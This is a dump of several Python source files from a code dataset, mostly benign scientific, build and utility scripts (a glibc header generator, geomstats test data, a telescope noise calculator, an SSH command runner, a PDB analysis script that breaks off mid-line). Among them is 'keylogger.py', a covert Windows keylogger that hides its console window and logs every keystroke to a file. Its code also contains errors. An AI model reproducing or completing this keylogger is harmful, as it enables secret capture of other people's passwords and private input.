1)),\n \"fix_bad_version_checks_2.9.diff\": (Version(2, 7), Version(2, 9)),\n \"fix_bad_version_checks_2.10.diff\": (Version(2, 10), Version(2, 12, 2)),\n \"fix_bad_version_checks.diff\": (Version(2, 13), Version(2, 18)),\n \"hvsep-remove.diff\": (Version(2, 16), Version(2, 16)),\n \"cvs-common-symbols.diff\": (Version(2, 23), Version(2, 25)),\n }\n\n for patch, v_limits in patches_table.items():\n if v_limits[0] <= version <= v_limits[1]:\n patch_path = \"{}/patches/{}\".format(basePath, patch)\n subprocess.check_call([\"git\", \"apply\", patch_path], cwd=glibcDir)\n\n\ndef get_glibc_binaries(version):\n \"\"\"\n Downloads and builds the specified version (git tag) of glibc.\n Returns the installed folder.\n \"\"\"\n glibcDir = basePath + \"/glibc\"\n buildDir = basePath + \"/builds/\" + str(version) + \"/build\"\n installDir = basePath + \"/builds/\" + str(version) + \"/install\"\n\n if not os.path.exists(glibcDir):\n subprocess.check_call([\"git\", \"clone\", \"git://sourceware.org/git/glibc.git\", glibcDir], cwd=basePath)\n\n if not os.path.exists(installDir + \"/build_succeeded\"):\n subprocess.check_call([\"git\", \"reset\", \"--hard\", \"HEAD\"], cwd=glibcDir)\n subprocess.check_call([\"git\", \"clean\", \"-dxf\"], cwd=glibcDir)\n\n subprocess.check_call([\"git\", \"checkout\", str(version)], cwd=glibcDir)\n\n apply_patches(glibcDir, version)\n\n if os.path.exists(buildDir):\n shutil.rmtree(buildDir)\n os.makedirs(buildDir)\n\n if os.path.exists(installDir):\n shutil.rmtree(installDir)\n os.makedirs(installDir)\n\n env = copy.deepcopy(os.environ)\n env[\"CC\"] = \"gcc\"\n if Version(2, 5) <= version <= Version(2, 16):\n env[\"CFLAGS\"] = \"-U_FORTIFY_SOURCE -O2 -fno-stack-protector\"\n if Version(2, 5) <= version <= Version(2, 21):\n env[\"LDFLAGS\"] = \"-no-pie\"\n\n jobString = \"-j\" + str(multiprocessing.cpu_count())\n\n subprocess.check_call([glibcDir + \"/configure\", \"--disable-werror\", \"--disable-sanity-checks\"], cwd=buildDir, env=env)\n subprocess.check_call([\"make\", jobString], cwd=buildDir)\n subprocess.check_call([\"make\", \"install_root=\" + installDir, \"install\", jobString], cwd=buildDir)\n\n with open(installDir + \"/build_succeeded\", \"wb\") as f:\n pass\n\n return installDir\n\n\ndef check_have_required_programs():\n requiredPrograms = [\"gcc\", \"make\", \"git\", \"readelf\", \"grep\"]\n\n missing = []\n\n for p in requiredPrograms:\n if distutils.spawn.find_executable(p) is None:\n missing.append(p)\n\n if missing:\n raise Exception(\"missing programs: \" + str(missing) + \", please install via your os package manager\")\n\nclass Version(object):\n def __init__(self, *args):\n if len(args) > 3 or len(args) < 2:\n raise Exception(\"invalid version: \" + str(args))\n\n self.major = int(args[0])\n self.minor = int(args[1])\n\n if len(args) == 3:\n self.patch = int(args[2])\n else:\n self.patch = 0\n\n def version_as_str(self):\n s = str(self.major) + \".\" + str(self.minor)\n if self.patch != 0:\n s += \".\" + str(self.patch)\n\n return s\n\n def __str__(self):\n return \"glibc-\" + self.version_as_str()\n\n def __repr__(self):\n return self.__str__()\n\n def __hash__(self):\n return hash((self.major, self.minor, self.patch))\n\n def __lt__(self, other):\n return (self.major, self.minor, self.patch) < (other.major, other.minor, other.patch)\n\n def __le__(self, other):\n return (self.major, self.minor, self.patch) <= (other.major, other.minor, other.patch)\n\n def __gt__(self, other):\n return (self.major, self.minor, self.patch) > (other.major, other.minor, other.patch)\n\n def __ge__(self, other):\n return (self.major, self.minor, self.patch) >= (other.major, other.minor, other.patch)\n\n def __eq__(self, other):\n return (self.major, self.minor, self.patch) == (other.major, other.minor, other.patch)\n\n def __ne__(self, other):\n return (self.major, self.minor, self.patch) != (other.major, other.minor, other.patch)\n\n\nSUPPORTED_VERSIONS = [\n Version(2, 5),\n Version(2, 5, 1),\n Version(2, 6),\n Version(2, 6, 1),\n Version(2, 7),\n Version(2, 8),\n Version(2, 9),\n Version(2, 10, 2),\n Version(2, 11, 3),\n Version(2, 12, 2),\n Version(2, 13),\n Version(2, 14),\n Version(2, 14, 1),\n Version(2, 15),\n Version(2, 16),\n Version(2, 17),\n Version(2, 18),\n Version(2, 19),\n Version(2, 20),\n Version(2, 21),\n Version(2, 22),\n Version(2, 23),\n Version(2, 24),\n Version(2, 25),\n Version(2, 26),\n Version(2, 27),\n]\n\n\ndef main():\n check_have_required_programs()\n\n if len(sys.argv) > 1:\n print(\"Warning, requesting specific versions may mean you miss out on defining missing symbols\")\n requested_versions = [Version(*v.split('.')) for v in sys.argv[1:]]\n else:\n requested_versions = SUPPORTED_VERSIONS # build all by default\n\n versionHeadersPath = basePath + \"/version_headers\"\n if os.path.exists(versionHeadersPath):\n shutil.rmtree(versionHeadersPath)\n\n syms = {}\n for version in requested_versions:\n print(\"generating data for version:\", version)\n installDir = get_glibc_binaries(version)\n syms[version] = extract_versions_from_installed_folder(installDir, version)\n\n allsyms = set.union(set(), *syms.values())\n for version in requested_versions:\n print(\"writing header for version:\", version)\n missingFuncs = allsyms - set(syms[version].keys())\n headerData = generate_header_string(syms[version], missingFuncs)\n\n if not os.path.exists(versionHeadersPath):\n os.makedirs(versionHeadersPath)\n\n with open(versionHeadersPath + \"/force_link_glibc_\" + version.version_as_str() + \".h\", 'w') as f:\n f.write(headerData)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"glibc_version_header_gen.py","file_name":"glibc_version_header_gen.py","file_ext":"py","file_size_in_byte":11683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"168142009","text":"import geomstats.backend as gs\nfrom geomstats.geometry.euclidean import Euclidean\nfrom geomstats.geometry.hyperboloid import Hyperboloid\nfrom geomstats.geometry.hypersphere import Hypersphere\nfrom geomstats.geometry.spd_matrices import (\n SPDAffineMetric,\n SPDEuclideanMetric,\n SPDLogEuclideanMetric,\n SPDMatrices,\n)\nfrom geomstats.learning.geometric_median import GeometricMedian\nfrom tests.data_generation import TestData\n\nEPSILON = 10e-6\n\n\nclass GeometricMedianTestData(TestData):\n def fit_test_data(self):\n estimator_0 = GeometricMedian(Euclidean(1))\n X_0 = gs.array(\n [\n [1.0 - 2 * EPSILON],\n [1.0 - EPSILON],\n [1.0 + EPSILON],\n [1.0 + 2 * EPSILON],\n [-100.0],\n ]\n )\n expected_0 = gs.array([1.0])\n\n space = SPDMatrices(1, equip=False)\n space.equip_with_metric(SPDEuclideanMetric)\n estimator_1 = GeometricMedian(space)\n X_1 = gs.array(\n [\n [[1.0 - 2 * EPSILON]],\n [[1.0 - EPSILON]],\n [[1.0 + EPSILON]],\n [[1.0 + 2 * EPSILON]],\n [[10.0]],\n ]\n )\n expected_1 = gs.array([[1.0]])\n\n space = SPDMatrices(2, equip=False)\n space.equip_with_metric(SPDAffineMetric)\n estimator_2 = GeometricMedian(space)\n X_2 = gs.array(\n [\n [[1.0 + EPSILON, 0.0], [0.0, 1.0 + EPSILON]],\n [[1.0 - EPSILON, 0.0], [0.0, 1.0 - EPSILON]],\n [[1.0, 0.0 + EPSILON], [0.0 + EPSILON, 1.0]],\n [[1.0, 0.0 - EPSILON], [0.0 - EPSILON, 1.0]],\n [[10.0, 0.0], [0.0, 10.0]],\n ]\n )\n expected_2 = gs.array([[1.0, 0.0], [0.0, 1.0]])\n\n smoke_data = [\n dict(estimator=estimator_0, X=X_0, expected=expected_0),\n dict(estimator=estimator_1, X=X_1, expected=expected_1),\n dict(estimator=estimator_2, X=X_2, expected=expected_2),\n ]\n\n return self.generate_tests(smoke_data)\n\n def fit_sanity_test_data(self):\n spd_matrices = SPDMatrices(4, equip=False)\n spd_matrices.equip_with_metric(SPDLogEuclideanMetric)\n smoke_data = [\n dict(\n estimator=GeometricMedian(Euclidean(2)),\n ),\n dict(\n estimator=GeometricMedian(Hyperboloid(3)),\n ),\n dict(\n estimator=GeometricMedian(Hypersphere(4)),\n ),\n dict(\n estimator=GeometricMedian(spd_matrices),\n ),\n ]\n\n return self.generate_tests(smoke_data)\n","sub_path":"tests/data/geometric_median_data.py","file_name":"geometric_median_data.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"466236455","text":"#!/usr/bin/python3\n\nimport numpy as np\n\ndef V2L_SO_sensitivity_calculator_r1(N_LF,N_MF,N_HF,N_UHF,f_sky):\n '''senstivity calculator for Simons Observatory V2 Large telescope'''\n '''vary the number of dicrhoic optics tubes in each band'''\n '''by default you should use 7 total tubes'''\n ## fixed varibles for paramters you shouldn't vary\n # sensitivity per band in uK-rt(s)\n S_LF_27 = 20.8\n S_LF_39 = 14.3\n S_MF_90 = 6.5\n S_MF_150 = 8.1\n S_HF_150 = 6.9\n S_HF_220 = 15.8\n S_UHF_220 = 13.8\n S_UHF_270 = 35.6\n #Observing duration\n n_years = 5.0\n efficiency = 0.4*.5*.85 ## the product of 40% observing efficiency\n ## 50% cuts retention\n ## and keeping only 85% of the map area\n ################\n ## check that the total nunber of tubes is correct\n total_tubes = N_LF+ N_MF+ N_HF+ N_UHF\n if (N_LF+ N_MF+ N_HF+ N_UHF) != 7:\n print(\"WARNING! You requested:\",total_tubes, \"optics tune while V2 includes budget for 7\")\n ## calculate the sensitivity in each band\n S_27 = S_39 = S_90 = S_150 = S_220 = S_270 = 1e9 ## e.g., make the noise irrelvently high by default\n # include LF receiver contirbutions\n S_27 = 1./np.sqrt( N_LF * S_LF_27**-2. + S_27**-2.)\n S_39 = 1./np.sqrt( N_LF * S_LF_39**-2. + S_39**-2.)\n # include MF receiver contirbutions\n S_90 = 1./np.sqrt( N_MF * S_MF_90**-2. + S_90**-2.)\n S_150 = 1./np.sqrt( N_MF * S_MF_150**-2. + S_150**-2.)\n # include HF receiver contirbutions\n S_150 = 1./np.sqrt( N_HF * S_HF_150**-2. + S_150**-2.)\n S_220 = 1./np.sqrt( N_HF * S_HF_220**-2. + S_220**-2.)\n # include UHF receiver contirbutions\n S_220 = 1./np.sqrt( N_UHF * S_UHF_220**-2. + S_220**-2.)\n S_270 = 1./np.sqrt( N_UHF * S_UHF_270**-2. + S_270**-2.)\n ### calculate the Noise per arcminute, per band\n integration_time = n_years *365.* 24. * 3600. * efficiency\n sky_area = 4.*np.pi * (180/np.pi)**2. * 3600. * f_sky\n N_27 = S_27 * np.sqrt(sky_area / integration_time)\n N_39 = S_39 * np.sqrt(sky_area / integration_time)\n N_90 = S_90 * np.sqrt(sky_area / integration_time)\n N_150 = S_150 * np.sqrt(sky_area / integration_time)\n N_220 = S_220 * np.sqrt(sky_area / integration_time)\n N_270 = S_270 * np.sqrt(sky_area / integration_time)\n ## return these sensitivity and bands\n bands = np.array([27,39,90,150,220,270.]) ## in GHz\n noise_per_arcminute = np.array([N_27,N_39,N_90,N_150,N_220,N_270])\n return(bands,noise_per_arcminute)\n\n\n## example of running this code\nf_sky = 0.4 ## 16,500 square degrees\nN_LF = 1 ## number of tubes in the LF band (30/40 GHz)\nN_MF = 4 ## number of tubes in the MF band (90/150 GHz)\nN_HF = 1 ## number of tubes in the HF band (150/220 GHz)\nN_UHF = 1 ## number of tubes in the UHF band (220/270 GHz)\nband_centers_GHZ, map_noise_uk_arcmin = V2L_SO_sensitivity_calculator_r1(N_LF,N_MF,N_HF,N_UHF,f_sky)\nprint(\"band centers: \", band_centers_GHZ, \"[GHz]\")\nprint(\"map noise per band:\",map_noise_uk_arcmin, \"[uK/arcmin_CMB]\")\nprint(\"calcualted for f_sky = \",f_sky, \"-or-\", f_sky* 4.*np.pi * (180/np.pi)**2., \"degrees^2\")\n","sub_path":"Code/python_scripts/SO_noise_gen.py","file_name":"SO_noise_gen.py","file_ext":"py","file_size_in_byte":3091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"90144010","text":"import win32api\r\nimport win32console\r\nimport win32gui\r\nimport pythoncom, pyHook\r\nwin=win32console.GetconsoleWindow()\r\nwin32gui=ShowWindow(win,0)\r\n\r\ndef OnKeyboardEvent(event):\r\n if event.Ascii==5:\r\n _exit(1)\r\n if event.Ascii !=0 or 8:\r\n f=open('keylogging.txt','r+')\r\n buffer=f.read()\r\n f.close()\r\n f=open('keylogging.txt','w')\r\n keylog=chr(event.Ascii)\r\n if event.Ascii==13:\r\n keylog='\\n'\r\n buffer=buffer+keylog\r\n f.write(buffer)\r\n f.close()\r\nhm=pyhook.HookManager()\r\nhm.KeyDown=OnKeyboardEvent\r\nhm=HookKeyboard()\r\npythoncom.PumpMessages()","sub_path":"keylogger.py","file_name":"keylogger.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"25958066","text":"import subprocess as subp\nimport shlex, sys, stat, os, socket, time, re\nimport dbglib as dbg\nimport config as cfg\n\ndef executeLocal(cmd, flog):\n cmd_split = shlex.split(cmd)\n p = subp.Popen(cmd_split, stdout=flog, stderr=flog)\n return p\n\ndef executeLocalBlock(cmd, flog):\n p = executeLocal(cmd, flog)\n p.wait()\n return p.returncode\n\ndef executeLocalBlockStdOut(cmd):\n return executeLocalBlock(cmd, sys.stdout)\n\ndef executeRemotely(cmd, flog, user, hostname, opt, script_name=\"./remote.bash\"):\n script_path = os.path.join(cfg.BUILD_DIR, script_name)\n\n f = open(script_path, 'w')\n print >> f, \"#!/bin/bash\"\n print >> f, \"ssh -oStrictHostKeyChecking=no %s@%s %s << 'ENDSSH'\" % (user, hostname, opt)\n print >> f, cmd\n print >> f, \"ENDSSH\"\n f.close()\n\n st = os.stat(script_path)\n os.chmod(script_path, st.st_mode | stat.S_IEXEC)\n p = subp.Popen(script_path, stdout=flog, stderr=flog)\n return p\n\ndef executeCmdUser(cmd, flog, hostname, script_name, username):\n if (hostname == \"localhost\") or (hostname == socket.gethostname()):\n p = executeLocal(cmd, flog)\n else:\n p = executeRemotely(cmd, flog, username, hostname, \"\", script_name)\n \n return p\n\ndef executeCmd(cmd, flog, hostname, script_name):\n if (hostname == \"localhost\") or (hostname == socket.gethostname()):\n p = executeLocal(cmd, flog)\n else:\n p = executeRemotely(cmd, flog, cfg.VM_USERNAME, hostname, \"\", script_name)\n \n return p\n\ndef executeCmdBlock(cmd, flog, hostname, script_name=\"./remote.bash\"):\n p = executeCmd(cmd, flog, hostname, script_name)\n return p.communicate()\n\ndef executeCmdBlockReturnCode(cmd, flog, hostname, script_name):\n p = executeCmd(cmd, flog, hostname, script_name)\n p.wait()\n return p.returncode\n\ndef executeCmdCheckReturnCode(cmd, flog, hostname, script_name):\n rv = executeCmdBlockReturnCode(cmd, flog, hostname, script_name)\n if rv != 0:\n dbg.print_error(\"'%s' failed on machine '%s'\" % (cmd, hostname))\n return rv\n \n\ndef executeAndCheckOutput(cmd, flog, hostname, script_name, check_str):\n output, _ = executeCmdBlock(cmd, flog, hostname, script_name)\n m = re.search(check_str, output)\n return m != None\n\ndef executeCmdBlockWithRetry(cmd, max_retries, interval, flog, hostname, script_name):\n rv = executeCmdBlockReturnCode(cmd, flog, hostname, script_name)\n retry_cnt = 1\n while (rv != 0) and (retry_cnt <= max_retries):\n time.sleep(interval)\n dbg.print_info(\"Retry # %d\" % retry_cnt)\n rv = executeCmdBlockReturnCode(cmd, flog, hostname, script_name)\n retry_cnt += 1\n return rv\n\ndef executeLocalGetOutput(cmd):\n p = executeLocal(cmd, subp.PIPE)\n (out, err) = p.communicate()\n return out\n\ndef waitProcGroupAndCheckExitCode(proc_l):\n failed_l = list()\n for p in proc_l:\n p.wait()\n if p.returncode != 0:\n failed_l.append(p)\n return failed_l\n\n","sub_path":"src/lib/execlib.py","file_name":"execlib.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"491235054","text":"# -*- coding: utf-8 -*-\n\"\"\"A cross-platform way in GitHub workflows to extract package version.\"\"\"\nimport inspect\nimport os\nimport re\nimport sys\nfrom typing import Optional\nfrom typing import Pattern\n\n\nif re != sys: # need to protect the #nosec comment from being deleted by zimports\n import subprocess # nosec # B404 security implications are considered\n\nPATH_OF_CURRENT_FILE = os.path.dirname((inspect.stack()[0][1]))\n\n# python3 .github/workflows/extract_package_info.py package_name\n# python3 .github/workflows/extract_package_info.py package_version\n\n\ndef _extract_info(regex: Pattern[str]) -> str:\n with open(os.path.join(PATH_OF_CURRENT_FILE, os.pardir, os.pardir, \"setup.py\"), \"r\") as in_file:\n content = in_file.read()\n match = re.search(regex, content)\n if match is None:\n raise NotImplementedError(\"A match in setup.py should always be found.\")\n output = match.group(1)\n print(output) # allow-print\n return output\n\n\ndef package_name() -> str:\n regex = re.compile(r\" name=\\\"(\\w+)\\\"\")\n return _extract_info(regex)\n\n\ndef package_version() -> str:\n regex = re.compile(r\" version=\\\"(.+?)\\\"\")\n return _extract_info(regex)\n\n\ndef pip_install(test_pypi: Optional[bool] = False) -> None:\n args = [\"pip\", \"install\", f\"{package_name()}=={package_version()}\"]\n if test_pypi:\n args.extend(\n [\n \"--index-url\",\n \"https://test.pypi.org/simple/\",\n \"--extra-index-url\",\n \"https://pypi.org/simple\",\n ]\n )\n print(f\"About to run with args: {args}\") # allow-print\n results = subprocess.run(args) # nosec # B603 shell is false, but input is secure\n if results.returncode != 0:\n sys.exit(results.returncode)\n\n\ndef confirm_version_tag_not_present_on_remote() -> None:\n from git import (\n Repo,\n ) # only import it here so that the simpler functions can be called that don't rely on this extra dependency if they need to be called earlier in the workflow\n\n version = package_version()\n repo = Repo(os.path.join(PATH_OF_CURRENT_FILE, os.pardir, os.pardir))\n tags = repo.git.ls_remote(\"--tags\", \"origin\")\n split_tags = tags.split(\"\\n\")\n for iter_tag in split_tags:\n if iter_tag.endswith(f\"tags/{version}\") or iter_tag.endswith(f\"tags/v{version}\"):\n print(f\"Tag for {version} already exists on remote: {iter_tag}\") # allow-print\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n first_arg = sys.argv[1]\n if first_arg == \"package_name\":\n package_name()\n elif first_arg == \"package_version\":\n package_version()\n elif first_arg == \"install_from_test_pypi\":\n pip_install(test_pypi=True)\n elif first_arg == \"install_from_pypi\":\n pip_install()\n elif first_arg == \"confirm_version_tag_not_present_on_remote\":\n confirm_version_tag_not_present_on_remote()\n","sub_path":".github/workflows/extract_package_info.py","file_name":"extract_package_info.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"536638436","text":"from model.videosModel import videosModel\nfrom model.moviecategorylist import moviecategorylist\nfrom core.faindController import faindController\nclass MainController(faindController):\n def execute(self):\n self.runFaind()\n def settings(self):\n self.model = videosModel()\n self.modellist = moviecategorylist()\n self.nameIndex = 2\n self.dir = ''\n self.editSectionName = 'Edit star'\n","sub_path":"controller/faind/MainController.py","file_name":"MainController.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"197143155","text":"#!/usr/bin/python3\n# coding: utf8\n\nimport sys, unicodedata\n\nspecials = {\n '%' : 'percent',\n '-' : 'minus',\n '_' : 'underscore',\n '>' : 'greater',\n '<' : 'less',\n ',' : 'comma',\n '.' : 'period',\n '$' : 'dollar',\n '!' : 'exclam',\n '?' : 'question',\n '+' : 'plus',\n '/' : 'slash',\n '#' : 'numbersign',\n '@' : 'at',\n '|' : 'bar',\n '`' : 'grave',\n '~' : 'asciitilde',\n '^' : 'asciicircum',\n '&': 'ampersand',\n '(' : 'parenleft',\n ')' : 'parenright',\n '[' : 'bracketleft',\n ']' : 'bracketright',\n '{' : 'braceleft',\n '}' : 'braceright',\n \"'\" : 'apostrophe',\n '\"' : 'quotedbl',\n '\\\\': 'backslash',\n ':' : 'colon',\n ';' : 'semicolon',\n '=' : 'equal',\n ' ' : 'space',\n '*' : 'asterisk',\n '♫' : 'Multi_key',\n '\\t': 'tab',\n}\n\nfor l in sys.stdin.readlines():\n l = l.strip('\\n')\n if not l or l.startswith(\"#\"):\n print(l)\n continue\n becomes = l[-1]\n l = l[:-1]\n sys.stdout.write(\"\")\n for c in l:\n sys.stdout.write(' <'+specials.get(c, c)+'>')\n n = hex(ord(becomes))[2:].upper()\n name = unicodedata.name(becomes)\n sys.stdout.write(' : \"{}\" U{} # {}\\n'.format(becomes, n, name))\n","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"204440336","text":"from binascii import hexlify\n\nfrom stp_core.loop.eventually import eventually\nfrom plenum.common.constants import DOMAIN_LEDGER_ID\nfrom plenum.test.helper import waitForSufficientRepliesForRequests\n\n\ndef checkNodesHaveSameRoots(nodes, checkUnCommitted=True,\n checkCommitted=True):\n def addRoot(root, collection):\n if root:\n collection.add(hexlify(root))\n else:\n collection.add(root)\n\n if checkUnCommitted:\n stateRoots = set()\n txnRoots = set()\n for node in nodes:\n addRoot(node.getState(DOMAIN_LEDGER_ID).headHash, stateRoots)\n addRoot(node.getLedger(DOMAIN_LEDGER_ID).uncommittedRootHash,\n txnRoots)\n\n assert len(stateRoots) == 1\n assert len(txnRoots) == 1\n\n if checkCommitted:\n stateRoots = set()\n txnRoots = set()\n for node in nodes:\n addRoot(node.getState(DOMAIN_LEDGER_ID).committedHeadHash,\n stateRoots)\n addRoot(node.getLedger(DOMAIN_LEDGER_ID).tree.root_hash,\n txnRoots)\n\n assert len(stateRoots) == 1\n assert len(txnRoots) == 1\n","sub_path":"plenum/test/batching_3pc/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"385839327","text":"from sklearn.linear_model import LinearRegression\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# 기온 데이터 읽어 들이기\ndf = pd.read_csv('./data/tem10y.csv', encoding=\"utf-8\")\n\n# 데이터를 학습 전용과 테스트 전용으로 분리하기\ntrain_year = (df[\"연\"] <= 2015)\ntest_year = (df[\"연\"] >= 2016)\ninterval = 6\n\n# 과거 6일의 데이터를 기반으로 학습할 데이터 만들기\ndef make_data(data):\n x = [] # 학습 데이터\n y = [] # 결과\n temps = list(data[\"기온\"])\n for i in range(len(temps)):\n if i < interval: continue\n y.append(temps[i])\n xa = []\n for p in range(interval):\n d = i + p - interval\n xa.append(temps[d])\n x.append(xa)\n return (x, y)\n\ntrain_x, train_y = make_data(df[train_year])\ntest_x, test_y = make_data(df[test_year])\n\nprint(type(train_x)) # list\n\nimport numpy as np\nprint(np.array(train_x).shape)\nprint(np.array(train_y).shape)\nprint(np.array(test_x).shape)\nprint(np.array(test_y).shape)\n\n# 직선 회귀 분석하기\n# lr = LinearRegression(normalize=True)\nfrom sklearn.ensemble import RandomForestRegressor\nlr = RandomForestRegressor() # 0.9068730711533413\nlr.fit(train_x, train_y) # 학습하기\npre_y = lr.predict(test_x) # 예측하기\n\naaa = lr.score(test_x, test_y)\nprint(aaa) # 0.923475843513415\n\n# 결과를 그래프로 그리기\nplt.figure(figsize=(10, 6), dpi=100)\nplt.plot(test_y, c='r')\nplt.plot(pre_y, c='b')\nplt.savefig('tenki-kion-lr.png')\nplt.show()\n\n# keras DNN 모델로 리파인\n# keras LSTM 모델로 리파인\n","sub_path":"cslee201909/ml/m08_weather1.py","file_name":"m08_weather1.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"240262419","text":"# create excel in memory using openpyxl\n\nimport openpyxl, os\n\n# print the version for openpyxl\nworkbook = openpyxl.Workbook()\nprint(type(workbook))\n\nworksheet = workbook.active\nprint(type(worksheet))\n\nworksheet.title = 'Joey Excel Test'\n\nfor i in range(1, 10):\n for j in range(1, 10):\n worksheet.cell(row=i, column=j).value = str(i) + ' * '+ str(j) + ' = ' + str(i * j)\n\n# save the doc\nexcel_path = os.getcwd() + '\\\\joeytestexcel.xlsx'\nworkbook.save(excel_path)\n","sub_path":"Python编程快速上手/第十二章/py_004_createexcel.py","file_name":"py_004_createexcel.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"150399901","text":"import re\n\nhandle = open('..\\Files\\mbox-short.txt')\nexp = input('Enter a regular expression: ')\ncounter = 0\n\nfor line in handle:\n line = line.rstrip()\n\n if re.search(exp, line):\n counter = counter + 1\n\nprint('The file had', counter, 'lines that matched', exp)\n","sub_path":"RegEx/grep.py","file_name":"grep.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"599153621","text":"#!/usr/bin/python\n# rrd-to-leveldb.py\n# (c) 2014 flabbergast\n#\n# -> Edit as necessary!\n#\n# Takes either:\n# - the output of 'rrdtool dump ...' (a xml file)\n# OR\n# - the output of 'rrdtool xport ...' (a xml file)\n# and writes the data to a levelDB, with keys 'TOPIC/timestamp'.\n# Choosing whether 'dump' or 'xport' is done by un/commenting below.\n#\n# An example for xport:\n# rrdtool xport --start 1393632000 --end 1412802000 --step 3600 --maxrows 6000 DEF:temp=nRFtemp.rrd:temperature:AVERAGE XPORT:temp:\"nRFtemp\" > nrftemp.xml\n# [start/end are 'epoch' seconds; can get them by\n# ruby -e 'puts Time.new(2014,10,8,22,0,0, \"+01:00\").to_i'\n# step: in seconds\n# maxrows: need to increase this, otherwise the default 400 will be used, which\n# may automatically increase the step to match this]\n#\n\nimport plyvel\nimport re\n\nDBASE = \"../../leveldatabase\"\nRRDXML = \"nrftemp.xml\"\nTOPIC = b'env/sitting/node/high/temp/'\n\ndb = plyvel.DB(DBASE) # , create_if_missing=True\nwb = db.write_batch()\n\n# this regex is for 'dump'ed xml:\n#r = re.compile('^\\s+ ([0-9.e+]+)<\\/v><\\/row>')\n\n# this one is for 'xport'ed xml:\nr = re.compile('^\\s+(\\d+)([0-9.e+]+)<\\/v><\\/row>')\n\nwith open(RRDXML) as f:\n for line in f:\n m = r.match(line)\n if m != None:\n time = int(m.group(1))\n value = float(m.group(2))\n# print(\"Time:\"+str(time)+\" Value:\"+str(value))\n wb.put(TOPIC+bytes(str(time),'ascii'), bytes(str(value),'ascii'))\n\nwb.write()\ndb.close()\n","sub_path":"rrd-to-leveldb/rrd-to-leveldb.py","file_name":"rrd-to-leveldb.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"34582166","text":"from __future__ import print_function\n\nimport argparse\nimport warnings\nimport pandas as pd\nimport time\n\nfrom Bio.PDB import *\nfrom shutil import rmtree\nfrom util import *\nfrom os import chdir, path, makedirs\n\nwarnings.filterwarnings(\"ignore\")\n\nparser = argparse.ArgumentParser(description=\"structure.py\")\nparser.add_argument(\"-i\", nargs=1, type=str, default=\"../../result/final.annotations.txt\",\n help=\"Annotation table path.\")\nparser.add_argument(\"-o\", nargs=1, type=str, default=\"../../result/structure.txt\",\n help=\"Output table path.\")\nparser.add_argument(\"-m\", nargs=1, type=str, default=\"../../result/structure_mock.txt\",\n help=\"Mock complexes output table path.\")\nparser.add_argument(\"-t\", nargs=1, type=str, default=\"../tmp/\",\n help=\"Temporary folder path\")\nparser.add_argument(\"--pdbfixer\", action=\"store_true\",\n help=\"Fix PDB files with PDBFixer (time-consuming!).\")\nparser.add_argument(\"--mock\", action=\"store_true\",\n help=\"Generate mock complexes (negative controls).\")\n\nargs = parser.parse_args()\n\nif type(args.i) is list:\n args.i = args.i[0]\ninput_file = path.abspath(args.i)\nif type(args.o) is list:\n args.o = args.o[0]\noutput_file = path.abspath(args.o)\nif type(args.m) is list:\n args.m = args.m[0]\noutput_file_mock = path.abspath(args.m)\nuse_pdbfixer = args.pdbfixer\ngenerate_mock = args.mock\n\nchdir(path.dirname(path.realpath(__file__)))\n\n# Create temporary folders\npdb_dir = path.abspath(args.t + '/pdb/')\n\nif not path.exists(pdb_dir):\n makedirs(pdb_dir)\n\n# Writing output file header, we'll drop some original annotation\n# columns such as chain identifiers, etc\ncol_names = ['pdb_id', 'species',\n 'mhc_type', 'mhc_a_allele', 'mhc_b_allele',\n 'antigen_seq', 'tcr_gene',\n 'tcr_v_allele', 'tcr_region', 'tcr_region_seq',\n 'aa_tcr', 'aa_antigen', 'len_tcr', 'len_antigen',\n 'pos_tcr', 'pos_antigen',\n 'distance', 'distance_CA']\n\nwith open(output_file, 'w') as f:\n f.write('\\t'.join(col_names) + '\\n')\n\n# Main loop\n\npdb_list = PDBList()\npdb_parser = PDBParser()\n\ntable = pd.read_table(input_file)\n\nbypdb = table.groupby(\"pdb_id\")\n\ni = 0\n\ndf_residues = []\n\nfor pdb_id, pdb_group in bypdb:\n # Load PDB file\n pdb_file = pdb_list.retrieve_pdb_file(pdb_id, pdir=pdb_dir)\n\n print(\"[\", time.strftime(\"%c\"), i, \"/\", table.shape[0], \"]\")\n print(pdb_id, \"- preparing for computation\")\n\n # Load model from original pdb file\n # In case of PDBFixer option it will be used to find\n # region ranges by overlapping Calpha atom positions\n model_original = pdb_parser.get_structure(pdb_id, pdb_file)[0]\n\n if use_pdbfixer:\n print(pdb_id, \"-- fixing PDB\")\n pdb_file_fixed = fix_pdb(pdb_id, pdb_file, pdb_group)\n # fixed model\n model = pdb_parser.get_structure(pdb_id, pdb_file_fixed)[0]\n else:\n model = model_original\n\n # Store annotation for entire complex\n pdb_annot = 